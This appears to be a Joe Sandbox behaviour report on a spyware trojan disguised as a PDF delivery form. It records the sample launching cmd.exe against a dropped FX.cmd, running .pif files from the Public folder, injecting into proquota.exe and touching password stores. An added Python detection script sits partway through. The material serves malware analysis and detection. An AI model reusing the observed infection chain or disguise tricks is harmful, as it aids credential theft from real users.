                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E8EEDB8_2_31E8EEDB
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DE2E908_2_31DE2E90
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E8CE938_2_31E8CE93
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DD0E598_2_31DD0E59
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E8EE268_2_31E8EE26
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_1_004015608_1_00401560
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_1_004020588_1_00402058
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_1_004025B08_1_004025B0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_1_004028708_1_00402870
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_1_004010E08_1_004010E0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_1_004032308_1_00403230
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_1_004012C08_1_004012C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_1_004033508_1_00403350
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_1_004015538_1_00401553
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_1_00401D698_1_00401D69
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_1_00401D708_1_00401D70
Source: Joe Sandbox View | Dropped File: C:\Users\Public\Libraries\dxobknwL.pif BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: String function: 029487A0 appears 54 times
Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: String function: 02948824 appears 45 times
Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: String function: 029344AC appears 73 times
Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: String function: 0293480C appears 931 times
Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: String function: 029344D0 appears 32 times
Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: String function: 029346A4 appears 244 times
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: String function: 31E17E54 appears 107 times
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: String function: 31E4F290 appears 103 times
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: String function: 31DBB970 appears 262 times
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: String function: 2A097E54 appears 107 times
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: String function: 2A0CF290 appears 103 times
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: String function: 31E05130 appears 58 times
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: String function: 2A085130 appears 58 times
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: String function: 2A03B970 appears 262 times
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: String function: 31E3EA12 appears 86 times
Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: String function: 2A0BEA12 appears 86 times
Source: C:\Users\Public\Libraries\Lwnkboxd.PIF | Code function: String function: 028887A0 appears 48 times
Source: C:\Users\Public\Libraries\Lwnkboxd.PIF | Code function: String function: 0287480C appears 619 times
Source: C:\Users\Public\Libraries\Lwnkboxd.PIF | Code function: String function: 028746A4 appears 154 times
Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1768171604.0000000021696000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818324740.00000000216CE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.000000000251E000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1768171604.00000000216C5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@27/8@3/3
Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_02937F5A GetDiskFreeSpaceA
Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_02946D50 CoCreateInstance
Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | File created: C:\Users\Public\LwnkboxdF.cmd
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5576:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7036:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3980:120:WilError_03
Source: C:\Windows\SysWOW64\proquota.exe | File created: C:\Users\user\AppData\Local\Temp\0j0OId92L
Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Lwnkboxd.PIF | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: proquota.exe, 00000010.00000003.2392117153.0000000000812000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000010.00000002.2455010423.0000000000812000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Virustotal: Detection: 33%
Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | ReversingLabs: Detection: 63%
Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | File read: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
Source: unknown | Process created: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe "C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe"
Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Process created: C:\Users\Public\Libraries\dxobknwL.pif C:\Users\Public\Libraries\dxobknwL.pif
Source: unknown | Process created: C:\Users\Public\Libraries\Lwnkboxd.PIF "C:\Users\Public\Libraries\Lwnkboxd.PIF"
Source: C:\Users\Public\Libraries\Lwnkboxd.PIF | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Libraries\Lwnkboxd.PIF | Process created: C:\Users\Public\Libraries\dxobknwL.pif C:\Users\Public\Libraries\dxobknwL.pif
Source: unknown | Process created: C:\Users\Public\Libraries\Lwnkboxd.PIF "C:\Users\Public\Libraries\Lwnkboxd.PIF"
Source: C:\Users\Public\Libraries\Lwnkboxd.PIF | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Libraries\Lwnkboxd.PIF | Process created: C:\Users\Public\Libraries\dxobknwL.pif C:\Users\Public\Libraries\dxobknwL.pif
Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | Process created: C:\Windows\SysWOW64\proquota.exe "C:\Windows\SysWOW64\proquota.exe"
Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | Process created: C:\Windows\SysWOW64\proquota.exe "C:\Windows\SysWOW64\proquota.exe"
Source: C:\Windows\SysWOW64\proquota.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmdJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess created: C:\Users\Public\Libraries\dxobknwL.pif C:\Users\Public\Libraries\dxobknwL.pifJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmdJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess created: C:\Users\Public\Libraries\dxobknwL.pif C:\Users\Public\Libraries\dxobknwL.pifJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmdJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess created: C:\Users\Public\Libraries\dxobknwL.pif C:\Users\Public\Libraries\dxobknwL.pifJump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeProcess created: C:\Windows\SysWOW64\proquota.exe "C:\Windows\SysWOW64\proquota.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeProcess created: C:\Windows\SysWOW64\proquota.exe "C:\Windows\SysWOW64\proquota.exe"Jump to behavior
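The process-creation rows above describe one execution chain: the sample (a ",pdf.scr.exe" double extension) runs cmd.exe against FX.cmd in C:\Users\Public\Libraries, launches .pif files from that same folder, and a binary under Program Files (x86) starts the SysWOW64 proquota.exe, which in turn launches firefox.exe. The following Python is an added example, not part of the Joe Sandbox report: it parses rows in the report's "Source: <parent> Process created: <image> <command line>" layout and applies parent/child heuristics that encode those visible patterns. The sample rows are constructed copies of rows from this page; the allowlists (browsers, routine helpers, document extensions) are illustrative assumptions to be tuned per environment.

```python
"""Added example (not from the Joe Sandbox report): parse the report's
"Source: <parent> Process created: <image> <command line>" rows and apply
a few parent/child heuristics to them."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample input: rows copied in the layout the report uses.
SAMPLE_ROWS = [
    r"Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd",
    r"Source: C:\Users\Public\Libraries\Lwnkboxd.PIF Process created: C:\Users\Public\Libraries\dxobknwL.pif C:\Users\Public\Libraries\dxobknwL.pif",
    r'Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe Process created: C:\Windows\SysWOW64\proquota.exe "C:\Windows\SysWOW64\proquota.exe"',
    r'Source: C:\Windows\SysWOW64\proquota.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"',
    r"Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
]

# <image> is matched non-greedily up to the first executable extension that is
# followed by whitespace or end of line, so image paths containing spaces
# ("C:\Program Files\...") still split correctly from the command line.
ROW_RE = re.compile(
    r"^Source:\s+(?P<parent>.+?)\s+Process created:\s+"
    r"(?P<image>[A-Za-z]:\\.+?\.(?:exe|pif|scr|com|cmd|bat))(?=\s|$)\s*(?P<cmdline>.*)$",
    re.IGNORECASE,
)

# Illustrative allowlists (assumptions for this example; tune per environment).
PUBLIC_DIR = "c:\\users\\public\\"
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
EXE_TOKENS = {"exe", "scr", "pif", "com", "bat", "cmd"}
DOC_TOKENS = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "png", "txt"}
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
COMMON_HELPERS = {"cmd.exe", "conhost.exe", "powershell.exe", "rundll32.exe"}


@dataclass
class ProcessEvent:
    parent: str
    image: str
    cmdline: str
    findings: List[str] = field(default_factory=list)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def looks_deceptive(name: str) -> bool:
    """.pif/.scr as the real extension, or a document/executable token hidden
    in the stem (',pdf.scr.exe' pretends to be a PDF while running as an EXE)."""
    stem, _, ext = name.lower().rpartition(".")
    if not stem:
        return False
    if ext in {"pif", "scr"}:
        return True
    tokens = [t for t in re.split(r"[.,\s]+", stem) if t]
    return any(t in EXE_TOKENS or t in DOC_TOKENS for t in tokens[1:])


def analyse(row: str) -> Optional[ProcessEvent]:
    m = ROW_RE.match(row.strip())
    if not m:
        return None
    ev = ProcessEvent(m["parent"], m["image"], m["cmdline"])
    parent, image, cmd = ev.parent.lower(), ev.image.lower(), ev.cmdline.lower()

    if any(PUBLIC_DIR in s for s in (parent, image, cmd)):
        ev.findings.append("execution involving C:\\Users\\Public")
    for path in (ev.parent, ev.image):
        if looks_deceptive(basename(path)):
            ev.findings.append(f"deceptive file name: {basename(path)}")
    # A browser whose parent is a System32/SysWOW64 binary (explorer.exe lives
    # one level up and is therefore not matched) is an unusual launch chain.
    if basename(image) in BROWSERS and parent.startswith(SYSTEM_DIRS):
        ev.findings.append("browser launched by a system binary")
    # A system-directory binary that is not a routine helper, started by a
    # parent outside C:\Windows, is a candidate host for process hollowing.
    if (image.startswith(SYSTEM_DIRS) and basename(image) not in COMMON_HELPERS
            and not parent.startswith("c:\\windows\\")):
        ev.findings.append("system binary launched by non-Windows parent (possible hollowing host)")
    return ev


def triage(rows: List[str]) -> List[ProcessEvent]:
    return [ev for ev in map(analyse, rows) if ev is not None]


if __name__ == "__main__":
    for ev in triage(SAMPLE_ROWS):
        tag = "SUSPICIOUS" if ev.findings else "ok"
        print(f"{tag:10} {basename(ev.parent)} -> {basename(ev.image)}: {'; '.join(ev.findings) or '-'}")
```

Run as a script, the four rows involving the Public folder, the .pif/.scr names, the proquota.exe launch and the firefox.exe child are flagged, while the routine cmd.exe -> conhost.exe row is not. The "hollowing host" heuristic is deliberately coarse (an installer starting msiexec.exe would also match), which is why the helper allowlist is exposed as a constant rather than hard-coded into the check.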
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: apphelp.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: msimg32.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: version.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: uxtheme.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: url.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: ieframe.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: iertutil.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: netapi32.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: userenv.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: winhttp.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: wkscli.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: netutils.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: amsi.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: smartscreenps.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: winmm.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: wininet.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: sspicli.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: windows.storage.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: wldp.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: profapi.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: mswsock.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: ieproxy.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: ieproxy.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: ieproxy.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: iphlpapi.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: winnsi.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: msasn1.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: msasn1.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: msasn1.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: mssip32.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: msasn1.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: mssip32.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: msasn1.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: mssip32.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: msasn1.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: dnsapi.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: rasadhlp.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: fwpuclnt.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: winhttpcom.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: webio.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: schannel.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: mskeyprotect.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: ntasn1.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: ncrypt.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: ncryptsslp.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: msasn1.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: cryptsp.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: rsaenh.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: cryptbase.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: gpapi.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: dpapi.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: ??????????.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: ??.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: sppc.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe Section loaded: am.dll
